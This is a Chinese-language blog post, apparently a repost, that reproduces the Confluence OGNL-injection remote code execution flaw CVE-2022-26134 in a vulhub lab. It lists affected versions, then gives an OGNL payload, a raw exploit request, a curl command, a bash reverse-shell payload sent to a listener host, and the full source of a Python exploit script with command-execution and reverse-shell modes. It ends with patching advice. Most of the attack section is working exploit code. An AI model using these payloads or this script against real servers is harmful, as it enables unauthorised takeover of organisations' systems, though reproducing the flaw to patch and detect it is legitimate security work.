Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现

admin
admin
admin
102210
文章
87
评论
2022年6月9日10:07:52评论462 views字数 5818阅读19分23秒阅读模式
Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现
点击上方“蓝字”,发现更多精彩。

0x00 漏洞简述


Atlassian Confluence是一个专业的企业知识管理与协同软件,主要用于公司内员工创建知识库并建立知识管理流程,也可以用于构建企业wiki。其使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。因此,该系统被国内较多知名互联网企业所采用,应用范围较广,因此该漏洞威胁影响范围较大。


2022年6月2日Atlassian官方发布了一则安全更新,通告了一个远程代码执行漏洞,攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令,直接获取目标系统权限。


漏洞编号:CVE-2022-26134

漏洞威胁等级:严重



0x01 漏洞影响版本

1、受影响版本:

Confluence Server and Data Center >= 1.3.0Confluence Server and Data Center < 7.4.17Confluence Server and Data Center < 7.13.7Confluence Server and Data Center < 7.14.3Confluence Server and Data Center < 7.15.2Confluence Server and Data Center < 7.16.4Confluence Server and Data Center < 7.17.4Confluence Server and Data Center < 7.18.1


2、安全版本:

Confluence Server and Data Center 7.4.17Confluence Server and Data Center 7.13.7Confluence Server and Data Center 7.14.3Confluence Server and Data Center 7.15.2Confluence Server and Data Center 7.16.4Confluence Server and Data Center 7.17.4Confluence Server and Data Center 7.18.1



0x02 漏洞环境搭建

漏洞环境:

系统:Centos 7 (192.168.110.135)

靶场:vulhub-master


启动环境:

1.cd/vulhub-master/confluence/CVE-2022-26134

2.dockers-compose up -d

3.环境启动后访问http://your-ip:8090,会进入安装引导,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书:


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


4. 填写邮箱后会发送一条邮件,然后按步骤完成注册


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


5. 注册完毕后获取key


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


6. 得到key后,在http://your-ip:8090界面输入key


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


7. 跳转到填写数据库信息的页面,PostgreSQL数据库地址为db,数据库名称confluence,用户名密码均为postgres


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


这里我设置用户名为:admin,密码为:passwd


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


8. 搭建成功,返回登录页面


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现



0x03 漏洞复现

1. 通过Burp Suite抓包检测


使用到的OGNL表达式为:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

经过URL编码后,构造GET请求数据包:

GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: 192.168.110.135:8090Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:JSESSIONID=36741E46B989F771E76C799AD46E8BC2Connection: close


发送数据包,任意命令执行,有回显的RCE,命令执行回显在X-Cmd-Response


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


2. 通过curl命令检测


curl -v http://192.168.110.135:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现



0x04 GetShell

Kali iP:192.168.110.128

Payload:

${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/ tcp/192.168.110.128/6666 0>&1').start()")}


1. Kali 开启监听,监听6666端口


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


2. 利用exp反弹Shell,成功GetShell


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现



0x05 漏洞EXP

1. 任意命令执行

python3 CVE-2022-26134exp.py [-u url] [-c command]


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


2. 附上exp详细使用参数及源码


Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


#!/usr/bin/python3# coding: utf-8# cve2022-26134# by: lxxlimport urllibimport requestsimport reimport sysfrom bs4 import BeautifulSoupimport urllib3
urllib3.disable_warnings()import argparse


def check(url):    r = requests.get(url + "/login.action", verify=False)    if (r.status_code == 200):        filter_version = re.findall("<span id='footer-build-information'>.*</span>", r.text)        if (len(filter_version) >= 1):            version = filter_version[0].split("'>")[1].split('</')[0]            return version        else:            return False    else:        return url

def exploit(url, command):    headers = {        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': '*/*',    }    r = requests.get(        url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22' + command + '%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/',        headers=headers, verify=False, allow_redirects=False)    if (r.status_code == 302):        return r.headers['X-Cmd-Response']    else:        return False
def shell():        shell = ip + "/" + port        shell1 = "'bash','-c','bash -i >& "        exp = shell1 + "/dev/tcp/"  + shell + " 0>&1'"        payload1 = '''${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('''        payload2 = exp + ''').start()")}/'''        payloads = payload1 + payload2        s = urllib.parse.quote(payloads)        return s

if __name__ == "__main__":    parser = argparse.ArgumentParser(description='cve2022-26134')    parser.add_argument('-u', '--url', help='target url', required=False)    parser.add_argument('-c', '--command', help='command', required=False)    parser.add_argument('-i', '--lhost', help='type', required=False)    parser.add_argument('-p', '--lport', help='type', required=False)    args = parser.parse_args()    cmd = args.command    ip = args.lhost    port = args.lport
    if (len(sys.argv) < 3):        print("USE: python3 " + sys.argv[0] + " -u https://target.com -c command")        print("ex: python3 " + sys.argv[0] + " -u https://target.com -i  your.ip -p your.port")
    if (sys.argv[3] == "-i"):            target = args.url            ip = args.lhost            port = args.lport            e = requests.get(target + shell())            if e.status_code == 200 or e.status_code == 302:                    print("[+] exploit success")            else:                    print("[-] exploit failed")
    else:        target = args.url        cmd = cmd.replace("'", "")        version = check(target)        print("============ GET Confluence Version ============")        if (version):            print("Version: " + version)        else:            print("Version: Not Found")        print(exploit(target, cmd))



0x06 漏洞修复

1. 升级Atlassian Confluence Server and Data Center至安全版本

2. 临时缓解方案:

下载官方发布的xwork-1.0.3-atlassian-10.jar替换confluence/WEB-INF/lib/目录下原来的xwork jar文件,并重启Confluence

下载地址:

https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar



内容仅供学习及自我检测修复,根据此文造成的任何后果均由用户个人承担。



我知道你在看
Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现


原文始发于微信公众号(米瑞尔信息安全):Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月9日10:07:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Confluence(CVE-2022-26134) OGNL表达式注入RCE 漏洞复现http://cn-sec.com/archives/1099861.html

发表评论

匿名网友 填写信息